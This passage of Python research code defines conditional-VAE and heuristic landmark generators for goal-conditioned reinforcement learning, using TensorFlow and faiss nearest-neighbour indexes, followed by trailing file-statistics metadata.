# Otherwise, generate using the VAE
sampled_zs = np.random.normal(size=(len(states), self.z_dim))
if self.use_actions:
feed_dict = {self.g['z']: sampled_zs, self.g['sag_ph']: np.concatenate([states, actions, goals], axis=1)}
else:
feed_dict = {self.g['z']: sampled_zs, self.g['sag_ph']: np.concatenate([states, goals], axis=1)}
landmark_states = self.sess.run(self.g['generated_landmark'], feed_dict=feed_dict)
if self.refine_with_NN:
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:,0]]
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (this is not a score-based generator)
pass
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
# self._save_to_file(save_path, data={}, params=None)
data = {
"landmark_buffer": self.landmark_buffer,
"refine_with_NN": self.refine_with_NN,
"use_actions": self.use_actions,
"hidden_dim": self.hidden_dim,
"z_dim": self.z_dim,
"batch_size": self.batch_size,
"num_training_steps": self.num_training_steps,
"learning_threshold": self.learning_threshold,
"max_nn_index_size": self.max_nn_index_size,
"steps": self.steps,
"landmarks": self.landmarks,
"d": self.d,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"buffer_size": self.buffer_size,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
# Model paramaters to be restored
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
class ScoreBasedVAEWithNNRefinement(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, refine_with_NN=False, use_actions=True, batch_size=128, num_training_steps=100, learning_threshold=100, max_nn_index_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=True)
self.get_scores_with_experiences = True
self.refine_with_NN = refine_with_NN
self.use_actions = use_actions
self.hidden_dim = 400
self.z_dim = 50
self.batch_size = batch_size
self.num_training_steps = num_training_steps
self.learning_threshold = learning_threshold
self.max_nn_index_size = max_nn_index_size
if self.goal_extraction_function is None:
raise ValueError("NonScoreBasedVAEWithNNRefinement requires a goal_extraction function!")
self.steps = 0
## Replay Buffers ##
self.landmarks = np.zeros((0, self.ob_space.shape[-1]))
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape),
("scores", (2,)) # score & ratio
])
## NN Index ##
self.d = self.ob_space.shape[-1]
self.index = faiss.IndexFlatL2(self.d)
if _init_setup_model:
self._setup_model()
def _setup_model(self):
## CVAE Graph ##
self.graph = tf.Graph()
with self.graph.as_default():
self.sess = tf_util.make_session(graph=self.graph)
with tf.variable_scope("scorevae"):
sag_len = self.ob_space.shape[-1] + self.goal_space.shape[-1] + 2
if self.use_actions:
sag_len += self.ac_space.shape[-1]
state_action_goal_scores = tf.placeholder(tf.float32, [None, sag_len], name='sag_placeholder')
landmark = tf.placeholder(tf.float32, [None, self.ob_space.shape[-1]], name='lm_placeholder')
# encoder
h = tf.layers.dense(tf.concat([state_action_goal_scores, landmark], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
mu = tf.layers.dense(h, self.z_dim)
log_variance = tf.layers.dense(h, self.z_dim)
z = tf.random_normal(shape=tf.shape(mu)) * tf.sqrt(tf.exp(log_variance)) + mu
# decoder
h = tf.layers.dense(tf.concat([state_action_goal_scores, z], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
generated_landmark = tf.layers.dense(h, self.ob_space.shape[-1])
# Distortion is the negative log likelihood: P(X|z,c)
l2_loss = tf.reduce_sum(tf.squared_difference(landmark, generated_landmark), 1)
tf.summary.scalar("VAE_distortion_l2Loss", tf.reduce_mean(l2_loss))
# The rate is the D_KL(Q(z|X,y)||P(z|c))
latent_loss = -0.5*tf.reduce_sum(1.0 + log_variance - tf.square(mu) - tf.exp(log_variance), 1)
tf.summary.scalar("VAE_rate_LatentLoss", tf.reduce_mean(latent_loss))
loss = tf.reduce_mean(l2_loss + latent_loss)
tf.summary.scalar("VAE_elbo", loss)
opt = tf.train.AdamOptimizer()
gradients = opt.compute_gradients(loss, var_list=tf.trainable_variables())
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, 1.), var)
ts = opt.apply_gradients(gradients)
init = tf.global_variables_initializer()
self.summary = tf.summary.merge_all()
self.params = tf.global_variables("scorevae")
self.sess.run(init)
self.g = {
'sagadd_ph': state_action_goal_scores,
'lm_ph': landmark,
'z': z,
'generated_landmark': generated_landmark,
'loss': loss,
'ts': ts,
'summary': self.summary
}
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
#prune half of the nn database
#I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size//2))
self.landmarks = self.landmarks[self.max_nn_index_size//2:]
nn_size = self.index.ntotal
assert(len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals, additional)
loss = 0
# run some training steps
for _ in range(self.num_training_steps):
self.steps +=1
s, a, l, g, add = self.landmark_buffer.sample(self.batch_size)
if self.use_actions:
feed_dict = {self.g['sagadd_ph']: np.concatenate((s, a, g, add), axis=1),
self.g['lm_ph']: l}
else:
feed_dict = {self.g['sagadd_ph']: np.concatenate((s, g, add), axis=1),
self.g['lm_ph']: l}
_, loss_, summary = self.sess.run([self.g['ts'], self.g['loss'], self.g['summary']], feed_dict=feed_dict)
loss += loss_
if self.steps % 100 == 0:
print("Landmark CVAE step {}: loss {}".format(self.steps, loss / self.num_training_steps))
return summary
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
# Generate randomly at first
if self.steps < self.learning_threshold:
self.landmark_states = landmark_states = np.random.choice(self.landmarks, size=len(states))
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
# Otherwise, generate using the VAE
sampled_zs = np.random.normal(size=(len(states), self.z_dim))
scores = np.concatenate([np.ones((len(states), 1)), np.zeros((len(states), 1))], 1) # condition on score = 1, ratio = 0.
if self.use_actions:
feed_dict = {self.g['z']: sampled_zs, self.g['sagadd_ph']: np.concatenate([states, actions, goals, scores], axis=1)}
else:
feed_dict = {self.g['z']: sampled_zs, self.g['sagadd_ph']: np.concatenate([states, goals, scores], axis=1)}
landmark_states = self.sess.run(self.g['generated_landmark'], feed_dict=feed_dict)
if self.refine_with_NN:
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:,0]]
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (this is not a score-based generator)
pass
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
# self._save_to_file(save_path, data={}, params=None)
data = {
"get_scores_with_experiences": self.get_scores_with_experiences,
"landmark_buffer": self.landmark_buffer,
"refine_with_NN": self.refine_with_NN,
"use_actions": self.use_actions,
"hidden_dim": self.hidden_dim,
"z_dim": self.z_dim,
"batch_size": self.batch_size,
"num_training_steps": self.num_training_steps,
"learning_threshold": self.learning_threshold,
"max_nn_index_size": self.max_nn_index_size,
"steps": self.steps,
"landmarks": self.landmarks,
"d": self.d,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"buffer_size": self.buffer_size,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
# Model paramaters to be restored
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
class FetchPushHeuristicGenerator(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=True)
self.landmarks = np.zeros((0, self.ob_space.shape[-1]))
self.d = self.ob_space.shape[-1]
self.index = faiss.IndexFlatL2(self.d)
self.max_nn_index_size = 200000
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
#prune half of the nn database
#I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size//2))
self.landmarks = self.landmarks[self.max_nn_index_size//2:]
nn_size = self.index.ntotal
assert(len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional):
pass
def generate(self, states, actions, goals):
"""6 dim goals"""
goal_pos = goals[:,:3]
obj_pos = states[:,3:6]
gripper_state = states[:, 9:11]
obj_rot = states[:,11:14]
goal_direction = goal_pos - obj_pos
normalized_goal_direction = goal_direction / np.linalg.norm(goal_direction, 1)
landmark_states = np.concatenate([
obj_pos - normalized_goal_direction * 0.15,
obj_pos,
normalized_goal_direction * 0.15,
gripper_state,
obj_rot,
np.zeros((len(states), 11))
], 1)
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:,0]]
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (this is not a score-based generator)
pass
def __len__(self):
return 0
class NonScoreBasedImageVAEWithNNRefinement(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, refine_with_NN=False, use_actions=True, batch_size=128, num_training_steps=100,
learning_threshold=100, max_nn_index_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=True)
self.refine_with_NN = refine_with_NN
self.use_actions = use_actions
self.hidden_dim = 400
self.z_dim = 50
self.batch_size = batch_size
self.num_training_steps = num_training_steps
self.learning_threshold = learning_threshold
self.max_nn_index_size = max_nn_index_size
if self.goal_extraction_function is None:
raise ValueError("NonScoreBasedVAEWithNNRefinement requires a goal_extraction function!")
self.steps = 0
## Replay Buffers ##
self.landmarks = np.zeros((0, np.prod(self.ob_space.shape)))
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape)
])
## NN Index ##
self.d = np.prod(self.ob_space.shape)
self.index = faiss.IndexFlatL2(int(self.d))
if _init_setup_model:
self._setup_model()
def _setup_model(self):
## CVAE Graph ##
self.graph = tf.Graph()
with self.graph.as_default():
self.sess = tf_util.make_session(graph=self.graph)
with tf.variable_scope("lervae"):
sag_len = np.prod(self.ob_space.shape) + np.prod(self.goal_space.shape)
if self.use_actions:
sag_len += self.ac_space.n
state_action_goal = tf.placeholder(tf.float32, [None, sag_len], name='sag_placeholder')
landmark = tf.placeholder(tf.float32, [None, np.prod(self.ob_space.shape)], name='lm_placeholder')
# encoder
h = tf.layers.dense(tf.concat([state_action_goal, landmark], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
mu = tf.layers.dense(h, self.z_dim)
log_variance = tf.layers.dense(h, self.z_dim)
z = tf.random_normal(shape=tf.shape(mu)) * tf.sqrt(tf.exp(log_variance)) + mu
# decoder
h = tf.layers.dense(tf.concat([state_action_goal, z], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
generated_landmark = tf.layers.dense(h, np.prod(self.ob_space.shape))
# Distortion is the negative log likelihood: P(X|z,c)
l2_loss = tf.reduce_sum(tf.squared_difference(landmark, generated_landmark), 1)
# The rate is the D_KL(Q(z|X,y)||P(z|c))
latent_loss = -0.5 * tf.reduce_sum(1.0 + log_variance - tf.square(mu) - tf.exp(log_variance), 1)
loss = tf.reduce_mean(l2_loss + latent_loss)
with tf.variable_scope("vae_loss"):
tf.summary.scalar("VAE_distortion_l2Loss", tf.reduce_mean(l2_loss))
tf.summary.scalar("VAE_rate_LatentLoss", tf.reduce_mean(latent_loss))
tf.summary.scalar("VAE_elbo", loss)
opt = tf.train.AdamOptimizer()
gradients = opt.compute_gradients(loss, var_list=tf.trainable_variables())
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, 1.), var)
ts = opt.apply_gradients(gradients)
init = tf.global_variables_initializer()
# TODO: Log the generated outputs
with tf.variable_scope("VAE_training_info", reuse=False):
generated_landmark_orig_shape = tf.reshape(generated_landmark, [-1] + list(self.ob_space.shape))
tf.summary.image("VAE_gen_landmark", generated_landmark_orig_shape, max_outputs=1)
landmark_orig_shape = tf.reshape(landmark, [-1] + list(self.ob_space.shape))
tf.summary.image("VAE_train_landmark", landmark_orig_shape, max_outputs=1)
# Split the SAG placeholder tensor into individual one
if self.use_actions:
state_ph, action_ph, goal_ph = tf.split(state_action_goal, [np.prod(self.ob_space.shape), self.ac_space.n, np.prod(self.goal_space.shape)], 1)
action_shape = tf.reshape(action_ph, [-1, self.ac_space.n, 1, 1])
tf.summary.image("VAE_action_input", action_shape, max_outputs=1)
else:
state_ph, goal_ph = tf.split(state_action_goal, [np.prod(self.ob_space.shape), np.prod(self.goal_space.shape)], 1)
# Reshape
state_orig_shape = tf.reshape(state_ph, [-1] + list(self.ob_space.shape))
goal_orig_shape = tf.reshape(goal_ph, [-1] + list(self.goal_space.shape))
tf.summary.image("VAE_state_input", state_orig_shape, max_outputs=1)
tf.summary.image("VAE_goal_input", goal_orig_shape, max_outputs=1)
self.summary = tf.summary.merge_all()
self.params = tf.global_variables("lervae")
self.sess.run(init)
self.g = {
'sag_ph': state_action_goal,
'lm_ph': landmark,
'z': z,
'generated_landmark': generated_landmark,
'loss': loss,
'ts': ts,
'summary': self.summary
}
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
states = np.reshape(states, [states.shape[0], -1]) # Reshape to batch_size x (H * W * C)
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
# prune half of the nn database
# I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size // 2))
self.landmarks = self.landmarks[self.max_nn_index_size // 2:]
nn_size = self.index.ntotal
assert (len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional=None):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals)
loss = 0
# run some training steps
for _ in range(self.num_training_steps):
self.steps += 1
s_, a_, l_, g_ = self.landmark_buffer.sample(self.batch_size)
s = np.reshape(s_, [-1, np.prod(self.ob_space.shape)])
l = np.reshape(l_, [-1, np.prod(self.ob_space.shape)])
g = np.reshape(g_, [-1, np.prod(self.ob_space.shape)])
a = self.get_one_hot(a_.astype(int), self.ac_space.n)
if self.use_actions:
feed_dict = {self.g['sag_ph']: np.concatenate((s, a, g), axis=1),
self.g['lm_ph']: l}
else:
feed_dict = {self.g['sag_ph']: np.concatenate((s, g), axis=1),
self.g['lm_ph']: l}
_, loss_, summary = self.sess.run([self.g['ts'], self.g['loss'], self.g['summary']], feed_dict=feed_dict)
loss += loss_
if self.steps % 100 == 0:
print("Landmark CVAE step {}: loss {}".format(self.steps, loss / self.num_training_steps))
return summary
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
# Generate randomly at first
if self.steps < self.learning_threshold:
sample_idx = np.random.choice(len(self.landmarks), len(states))
landmark_states = self.landmarks[sample_idx]
# Reshape it back to batch_size x H x W x C
landmark_states = np.reshape(landmark_states, [-1] + list(self.ob_space.shape))
self.landmark_states = landmark_states
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
# Otherwise, generate using the VAE
states = np.reshape(states, [-1, np.prod(self.ob_space.shape)])
goals = np.reshape(goals, [-1, np.prod(self.ob_space.shape)])
actions = self.get_one_hot(actions.astype(int), self.ac_space.n)
sampled_zs = np.random.normal(size=(len(states), self.z_dim))
if self.use_actions:
feed_dict = {self.g['z']: sampled_zs, self.g['sag_ph']: np.concatenate([states, actions, goals], axis=1)}
else:
feed_dict = {self.g['z']: sampled_zs, self.g['sag_ph']: np.concatenate([states, goals], axis=1)}
landmark_states = self.sess.run(self.g['generated_landmark'], feed_dict=feed_dict)
if self.refine_with_NN:
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:, 0]]
# Reshape the landmark_states and goals back
landmark_states = np.reshape(landmark_states, [-1] + list(self.ob_space.shape))
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (this is not a score-based generator)
pass
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
# self._save_to_file(save_path, data={}, params=None)
data = {
"landmark_buffer": self.landmark_buffer,
"refine_with_NN": self.refine_with_NN,
"use_actions": self.use_actions,
"hidden_dim": self.hidden_dim,
"z_dim": self.z_dim,
"batch_size": self.batch_size,
"num_training_steps": self.num_training_steps,
"learning_threshold": self.learning_threshold,
"max_nn_index_size": self.max_nn_index_size,
"steps": self.steps,
"landmarks": self.landmarks,
"d": self.d,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"buffer_size": self.buffer_size,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
# Model paramaters to be restored
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
def get_one_hot(self, targets, nb_classes):
res = np.eye(nb_classes)[np.array(targets).reshape(-1)]
return res.reshape(list(targets.shape) + [nb_classes])
class ScoreBasedImageVAEWithNNRefinement(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, refine_with_NN=False, use_actions=True, batch_size=128, num_training_steps=100,
learning_threshold=100, max_nn_index_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=True)
self.get_scores_with_experiences = True
self.refine_with_NN = refine_with_NN
self.use_actions = use_actions
self.hidden_dim = 400
self.z_dim = 50
self.batch_size = batch_size
self.num_training_steps = num_training_steps
self.learning_threshold = learning_threshold
self.max_nn_index_size = max_nn_index_size
if self.goal_extraction_function is None:
raise ValueError("NonScoreBasedVAEWithNNRefinement requires a goal_extraction function!")
self.steps = 0
## Replay Buffers ##
self.landmarks = np.zeros((0, np.prod(self.ob_space.shape)))
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape),
("scores", (2,)) # score & ratio
])
## NN Index ##
self.d = np.prod(self.ob_space.shape)
self.index = faiss.IndexFlatL2(int(self.d))
if _init_setup_model:
self._setup_model()
def _setup_model(self):
## CVAE Graph ##
self.graph = tf.Graph()
with self.graph.as_default():
self.sess = tf_util.make_session(graph=self.graph)
with tf.variable_scope("scorevae"):
sag_len = np.prod(self.ob_space.shape) + np.prod(self.goal_space.shape) + 2
if self.use_actions:
sag_len += self.ac_space.n
state_action_goal_scores = tf.placeholder(tf.float32, [None, sag_len], name='sag_placeholder')
landmark = tf.placeholder(tf.float32, [None, np.prod(self.ob_space.shape)], name='lm_placeholder')
# encoder
h = tf.layers.dense(tf.concat([state_action_goal_scores, landmark], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
mu = tf.layers.dense(h, self.z_dim)
log_variance = tf.layers.dense(h, self.z_dim)
z = tf.random_normal(shape=tf.shape(mu)) * tf.sqrt(tf.exp(log_variance)) + mu
# decoder
h = tf.layers.dense(tf.concat([state_action_goal_scores, z], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
generated_landmark = tf.layers.dense(h, np.prod(self.ob_space.shape))
# logit = tf.layers.dense(h, np.prod(self.ob_space.shape))
# landmark_likelihood = tfp.distributions.Independent(tfp.distributions.Bernoulli(logit), 1) # Treat the last dim as one image
# generated_landmark = tf.cast(tf.reduce_mean(landmark_likelihood.sample(10), 0), tf.float32) # Sample 1 samples and average them
# Distortion is the negative log likelihood: P(X|z,c)
# TODO: Change into bernoulli loss?
l2_loss = tf.reduce_sum(tf.squared_difference(landmark, generated_landmark), 1)
# l2_loss = landmark_likelihood.log_prob(landmark)
# l2_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=landmark,logits=logit), 1)
# The rate is the D_KL(Q(z|X,y)||P(z|c))
latent_loss = -0.5 * tf.reduce_sum(1.0 + log_variance - tf.square(mu) - tf.exp(log_variance), 1)
loss = tf.reduce_mean(l2_loss + latent_loss)
with tf.variable_scope("vae_loss"):
tf.summary.scalar("VAE_distortion_l2Loss", tf.reduce_mean(l2_loss))
tf.summary.scalar("VAE_rate_LatentLoss", tf.reduce_mean(latent_loss))
tf.summary.scalar("VAE_elbo", loss)
opt = tf.train.AdamOptimizer()
gradients = opt.compute_gradients(loss, var_list=tf.trainable_variables())
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, 1.), var)
ts = opt.apply_gradients(gradients)
init = tf.global_variables_initializer()
# TODO: Log the generated outputs
with tf.variable_scope("VAE_training_info", reuse=False):
generated_landmark_orig_shape = tf.reshape(generated_landmark, [-1] + list(self.ob_space.shape))
tf.summary.image("VAE_gen_landmark", generated_landmark_orig_shape, max_outputs=1)
landmark_orig_shape = tf.reshape(landmark, [-1] + list(self.ob_space.shape))
tf.summary.image("VAE_train_landmark", landmark_orig_shape, max_outputs=1)
# Split the SAG placeholder tensor into individual one
if self.use_actions:
state_ph, action_ph, goal_ph, scores_ph = tf.split(state_action_goal_scores, [np.prod(self.ob_space.shape), self.ac_space.n, np.prod(self.goal_space.shape), 2], 1)
action_shape = tf.reshape(action_ph, [-1, self.ac_space.n, 1, 1])
tf.summary.image("VAE_action_input", action_shape, max_outputs=1)
else:
state_ph, goal_ph, scores_ph = tf.split(state_action_goal, [np.prod(self.ob_space.shape), np.prod(self.goal_space.shape), 2], 1)
# Reshape
state_orig_shape = tf.reshape(state_ph, [-1] + list(self.ob_space.shape))
goal_orig_shape = tf.reshape(goal_ph, [-1] + list(self.goal_space.shape))
tf.summary.image("VAE_state_input", state_orig_shape, max_outputs=1)
tf.summary.image("VAE_goal_input", goal_orig_shape, max_outputs=1)
self.summary = tf.summary.merge_all()
self.params = tf.global_variables("scorevae")
self.sess.run(init)
self.g = {
'sagadd_ph': state_action_goal_scores,
'lm_ph': landmark,
'z': z,
'generated_landmark': generated_landmark,
'loss': loss,
'ts': ts,
'summary': self.summary
}
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
states = np.reshape(states, [states.shape[0], -1]) # Reshape to batch_size x (H * W * C)
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
# prune half of the nn database
# I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size // 2))
self.landmarks = self.landmarks[self.max_nn_index_size // 2:]
nn_size = self.index.ntotal
assert (len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals, additional)
loss = 0
# run some training steps
for _ in range(self.num_training_steps):
self.steps += 1
s_, a_, l_, g_, add = self.landmark_buffer.sample(self.batch_size)
s = np.reshape(s_, [-1, np.prod(self.ob_space.shape)])
l = np.reshape(l_, [-1, np.prod(self.ob_space.shape)])
g = np.reshape(g_, [-1, np.prod(self.ob_space.shape)])
a = self.get_one_hot(a_.astype(int), self.ac_space.n)
if self.use_actions:
feed_dict = {self.g['sagadd_ph']: np.concatenate((s, a, g, add), axis=1),
self.g['lm_ph']: l}
else:
feed_dict = {self.g['sagadd_ph']: np.concatenate((s, g, add), axis=1),
self.g['lm_ph']: l}
_, loss_, summary = self.sess.run([self.g['ts'], self.g['loss'], self.g['summary']], feed_dict=feed_dict)
loss += loss_
if self.steps % 100 == 0:
print("Landmark CVAE step {}: loss {}".format(self.steps, loss / self.num_training_steps))
return summary
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
# Generate randomly at first
if self.steps < self.learning_threshold:
sample_idx = np.random.choice(len(self.landmarks), len(states))
landmark_states = self.landmarks[sample_idx]
# Reshape it back to batch_size x H x W x C
landmark_states = np.reshape(landmark_states, [-1] + list(self.ob_space.shape))
self.landmark_states = landmark_states
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
# Otherwise, generate using the VAE
states = np.reshape(states, [-1, np.prod(self.ob_space.shape)])
goals = np.reshape(goals, [-1, np.prod(self.ob_space.shape)])
actions = self.get_one_hot(actions.astype(int), self.ac_space.n)
sampled_zs = np.random.normal(size=(len(states), self.z_dim))
scores = np.concatenate([np.ones((len(states), 1)), np.zeros((len(states), 1))], 1) # condition on score = 1, ratio = 0.
if self.use_actions:
feed_dict = {self.g['z']: sampled_zs, self.g['sagadd_ph']: np.concatenate([states, actions, goals, scores], axis=1)}
else:
feed_dict = {self.g['z']: sampled_zs, self.g['sagadd_ph']: np.concatenate([states, goals, scores], axis=1)}
landmark_states = self.sess.run(self.g['generated_landmark'], feed_dict=feed_dict)
if self.refine_with_NN:
query = landmark_states.astype('float32')
_, lidxs = self.index.search(query, 1)
landmark_states = self.landmarks[lidxs[:, 0]]
# Reshape the landmark_states and goals back
landmark_states = np.reshape(landmark_states, [-1] + list(self.ob_space.shape))
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (this is not a score-based generator)
pass
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
# self._save_to_file(save_path, data={}, params=None)
data = {
"get_scores_with_experiences": self.get_scores_with_experiences,
"landmark_buffer": self.landmark_buffer,
"refine_with_NN": self.refine_with_NN,
"use_actions": self.use_actions,
"hidden_dim": self.hidden_dim,
"z_dim": self.z_dim,
"batch_size": self.batch_size,
"num_training_steps": self.num_training_steps,
"learning_threshold": self.learning_threshold,
"max_nn_index_size": self.max_nn_index_size,
"steps": self.steps,
"landmarks": self.landmarks,
"d": self.d,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"buffer_size": self.buffer_size,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
# Model paramaters to be restored
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
def get_one_hot(self, targets, nb_classes):
res = np.eye(nb_classes)[np.array(targets).reshape(-1)]
return res.reshape(list(targets.shape) + [nb_classes])
| 39.965182
| 193
| 0.67338
| 6,872
| 49,357
| 4.587602
| 0.054424
| 0.026962
| 0.024075
| 0.031466
| 0.893358
| 0.884254
| 0.871757
| 0.864937
| 0.86094
| 0.856277
| 0
| 0.010635
| 0.203679
| 49,357
| 1,234
| 194
| 39.997569
| 0.791472
| 0.099236
| 0
| 0.84642
| 0
| 0
| 0.069698
| 0.009856
| 0
| 0
| 0
| 0.001621
| 0.006928
| 1
| 0.073903
| false
| 0.010393
| 0.006928
| 0.008083
| 0.120092
| 0.004619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.